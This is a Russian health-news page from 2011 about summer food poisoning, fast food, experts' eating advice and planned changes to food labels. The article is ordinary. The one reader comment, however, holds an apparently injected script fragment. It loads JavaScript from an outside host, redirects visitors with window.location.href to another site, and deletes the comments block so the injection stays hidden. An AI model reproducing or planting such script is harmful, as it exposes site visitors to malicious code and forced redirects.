Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вкусно, но опасно  >>  Вкусно, но опасно
 
Обратная связь
 

Вкусно, но опасно

Размер шрифта
22 июля 2011 07:01
  • google_analytics: false
  • Нравится

Нынешний сезон выдался урожайным на пищевые отравления: в Европе свирепствует кишечная палочка, на Украине бушует холера, на востоке в магазинах продают радиоактивную говядину. Из российских регионов регулярно приходят сообщения о вспышках сальмонеллеза. Как уберечь себя и близких в это неспокойное лето 2011 года?


Александр Тушкин / «Здоровье инфо»

Именно этой теме был посвящен видеомост «Москва-Питер-Томск», состоявшийся на этой неделе в РИА «Новости». Внимание экспертов сосредоточилось, главным образом, на предприятиях быстрого питания. Эксперты сошлись во мнении, что фастфуд прекрасно прижился на российской земле, и, конечно, ничего хорошего в этом нет.

– При СССР была разрушена традиция ресторанного питания. У нас сформировались неправильные понятия о питании. Поэтому на завтрак мы едим бутерброд со сладким чаем, а этому фастфуд только потакает, – считает ректор Московского государственного университета пищевых производств Дмитрий Еделев.

Наибольшую опасность летом представляют «восточные базары» – уличные палатки с шаурмой, беляшами и чебуреками. Продукция таких лавочек не только изобилует насыщенными жирами, но и не отвечает санитарным нормам. Еделев отметил, что лучше голодать, чем питаться в таких местах.

Представители Роспотребнадзора считают, что потребитель нынче пошел грамотный и всякую гадость в рот совать не будет. Доля пресловутых шаурмистов на улицах крупных городов сократилась почти в 10 раз. По данным комитета, только в Санкт-Петербурге осталось всего 300 точек. Другое дело – нелегальные предприниматели.

Если палатка не имеет вывески с названием юридического лица, то такое место лучше обходить стороной. А лучше всего – написать жалобу,

– считает заместитель начальника отдела надзора за питанием населения управления Роспотребнадзора по Санкт-Петербургу Вероника Тыльчевская.

Своей главной победой над уличными торговцами эксперты считают запрет на торговлю салатов, заправленных майонезом. Такой перекус – верный путь к ожирению, диабету 2 типа и даже больничной койке, если салат был приготовлен с нарушениями санитарии и хранился вне холодильной камеры.

– Летом ограничьте потребление жиров. От майонеза и других жирных соусов лучше вообще отказаться. Ешьте побольше фруктов и овощей, только мойте их щеткой и мылом. По возможности на улице не питайтесь, – советует Вероника Тыльчевская.

Треть смертей в России случается из-за неправильного питания

Такие цифры приводит руководитель программ общественного здоровья Международной конфедерации обществ потребителей Марина Чернова. Она считает, что в вопросах о питании речь должна идти не только об эпидемиологической безопасности, но и формировании правильного пищевого поведения.

Здоровое питание – лучшее капиталовложение в собственное будущее

По мнению эксперта, пищевое поведение у россиян нарушается с самого детства. Так называемый «детский набор» в популярных сетях быстрого питания, которые включают игрушки для стимуляции продаж, превышают дневной норматив по содержанию сахара, соли и насыщенных жиров.

На вопрос «Здоровье инфо» эксперт честно призналась, что не стала бы летом перекусывать в городских палатках.

– Я бы забежала в магазин и купила что-нибудь из легких молочных продуктов. Например, обезжиренный кефир, – отметила Марина Чернова. Она настойчиво рекомендует потребителям отдавать предпочтение летом продуктовым магазинам, чем сетям быстрого питания. – А еще лучше, для идеального питания летом и зимой: готовьте сами.

С продуктовыми магазинами, надо отметить, тоже не все в порядке. На сегодняшний момент у нас сильно хромает государственное регулирование в области маркировки продуктов питания, говорит эксперт. Российские этикетки дают минимум необходимой информации: содержание белков, жиров, углеводов и общий калораж. На Западе маркировка продуктов жестко регламентирована:

  1. Информационный блок графически выделяется на фоне упаковки

  2. Используется крупный шрифт для слабовидящего человека

  3. Дата производства и срок годности выносятся на фронтальную часть упаковки

  4. Таблица макронутриентов содержит данные, сколько калорий приносят углеводы и жиры

  5. В информационный блок включено содержание соли (в некоторых странах это натрий) и насыщенных жиров

  6. Количество сахара вынесено в отдельную категорию, а не включено в углеводы

Марина Чернова отмечает, что в ближайшее время российские стандарты оформления упаковки будут максимально приближены к западным. Сейчас в Таможенный союз Евразийского экономического сообщества внесен технический регламент новых упаковок. На данный момент можно точно сказать, что они будут включать данные по соли, сахару и насыщенным жирам.

Не путайте калории с килокалориями!
Калориями измеряется энергия, например, тепловая энергия. 1 калория — это единица энергии, необходимая для нагревания 1 г воды на 1 градус Цельсия. Килокалория в теории в 1000 раз больше, но на практике калории и килокалории – это одно и то же. Просто для удобства в речи или на письме пишут калории, хотя подразумевают килокалории. В научных работах чаще используют джоули, хотя такая маркировка встречается в некоторых странах. 1 калория соответствует 4,2 джоуля.
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Причины запора у взрослых: от серьезных до легко устранимых   Коктейли для похудения   Когда «обман» во благо   Десять привычек, которые помогут похудеть  
28 июля 2011Шунтирование желудка меняет вкусовые пристрастия 01 сентября 2011Женщины должны есть медленно
 
01 августа 2011Больше жевать – меньше есть 28 июля 2011Ученые доказали, что депрессию можно заесть
 

Слайдшоу

1
Перекусы: меньше 100 ккал в порции. Часть 2
Супереда для вашей кожи
Как начать худеть и не останавливаться?

Тесты

1
Правильно ли вы худеете?
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.